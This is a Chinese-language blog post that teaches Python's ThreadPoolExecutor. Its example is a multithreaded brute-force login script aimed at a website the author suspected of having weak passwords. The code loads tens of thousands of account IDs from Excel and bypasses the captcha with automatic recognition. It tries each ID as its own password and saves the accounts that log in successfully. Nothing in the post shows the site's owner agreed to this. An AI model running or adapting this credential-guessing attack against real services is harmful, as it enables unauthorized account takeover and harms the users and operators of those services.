基于ThreadPoolExecutor的Python多线程爬虫

前言

之前发现某站可能存在弱密码(数据已脱敏),便想尝试用Python爬虫进行穷举,但是账号表里有几万条用户信息,若使用单线程则平均每分钟只能检测2-3条信息,故想使用多线程提升程序效率。python最常用的多线程相关库是threading,但显然它已经过时了,故选用官方线程池库ThreadPoolExecutor实现。

背景

进程

进程统进行资源分配的最小单位,它是程序执行时的一个实例。程序运行时系统就会创建一个进程,并为它分配资源,然后把该进程放入进程就绪队列,进程调度器选中它的时候就会为它分配CPU时间,程序开始真正运行。每个进程都有自己的独立内存空间,不同进程通过进程间通信来通信。

线程

线程是程序执行时的最小单位,它是进程的一个执行流,是CPU调度和分派的基本单位,一个进程至少包含一个主线程,也可以由很多个线程组成,线程间共享进程的所有资源,每个线程有自己的堆栈和局部变量。

协程

协程又称为微线程 ,是一种用户态的轻量级线程,协程的调度完全由用户控制。协程拥有自己的寄存器上下文和栈。协程调度切换时,将寄存器上下文和栈保存到其他地方,在切回来的时候,恢复先前保存的寄存器上下文和栈,直接操作栈则基本没有内核切换的开销,可以不加锁的访问全局变量,所以上下文的切换非常快。在python中用户调度的方式一开始是通过yield关键字 来实现的,后面有了asyncio模块来专门支持协程。

用法

ThreadPoolExecutor 使用时一定要使用 with ,而不要使用 for ,如果你一定要用 for ,那么一定要手动进行 executor.shutdown,而 with 在使用完毕之后可以自行关闭线程池,减少资源浪费。其主要有两种创建线程的方法12:

  1. 通过map
1
2
3
4
5
6
7
8
with ThreadPoolExecutor(max_workers=2) as executor:
  result = executor.map(map_fun, itr_arg)
  '''map_fun:你传入的要执行的map函数,也就是子线程函数
    itr_arg:一个可迭代的参数,每次迭代就创建一个线程并且将本参数传入该线程函数
    注意result并不是你map_fun返回的结果,而是一个生成器,如果要从中去结果,你可以使用列表生成式或者其他你想使用的方法
  '''
  for res in result:
    print(res) #这个res就是你map_fun返回的结果,你可以在这里做进一步处理
  1. 通过submit+as_completed
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
with ThreadPoolExecutor(max_workers=2) as executor:
  future= executor.submit(fun, args)
  '''
  在这里你可以使用for循环来做,返回的是一个future对象
  future_list=[]
  for i in range(max_workers):
    future= executor.submit(fun, args[i])
    future_list.append(future)
  '''
  for res in ac_completed(futrue_list): #这个futrure_list是你future对象的列表
    print(res.result())        #循环遍历时用.result()来取返回值

示例

需求

现有一网站,已知其用户登录账号列表,通过枚举常用弱密码的方式尝试爆破。账号保存在Excel中,每个账号即是一个任务,将所有任务存入Queue结构中(Python的Queue结构线程安全),在子线程内不断取出Queue中的任务并完成检查。

代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# 重试次数
retry = 3
timeout = 5
# 任务队列
task_queue = Queue()
# 通过检测的任务
available = []
# 初始化任务
def init():
    xls_path = r"Users.xlsx"
    xls = pd.read_excel(xls_path, header=0)
    ids = xls.loc[:]["工号"]
    for id in ids:
        task_queue.put(id)

# 主登录逻辑
def login(username, password):
    login_url = "login_url"
    logout_url = "logout_url"
    captcha_url = "captcha_url"
    session = requests.Session()
    # 获取初始参数
    login_resp = session.get(login_url, timeout=timeout)
    # ASP解析
    formdata = AspUtil.extract(login_resp.text)
    formdata["UserName"] = username
    formdata["Password"] = password
    # 获取验证码
    captcha_resp = session.get(captcha_url, timeout=timeout)
    # 识别验证码
    formdata['CheckCode'] = getImgCheck(captcha_resp)
    # 开始登录
    login_resp = session.post(login_url, data=formdata, timeout=timeout)
    if re.findall(r"验证码不对", login_resp.text):
        return login(username, password)
    if re.findall(r"登陆失败", login_resp.text):
        print(username + "\t密码错误")
        return False
    if re.findall(r"登录成功", login_resp.text):
        session.get(logout_url)
        print(username + "\t登录成功")
        available.append(username)
        return username

# 单线程
def single_task(task_name):
    # 不断访问任务队列进行处理
    while not task_queue.empty():
        username = task_queue.get()
        login(username, username)

# 主函数
def main(max_workers):
    init()
    executor = ThreadPoolExecutor(max_workers)
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        futures = []
        for i in range(max_workers):
            future = executor.submit(single_task, str(i))
            futures.append(future)
        for res in as_completed(futures):
            print(res.result())
    print(available)
    # 保存可用账户
    with open(r"./available.txt", 'w') as fp:
        json.dump(available, fp)

if __name__ == "__main__":
    fire.Fire(main)

参考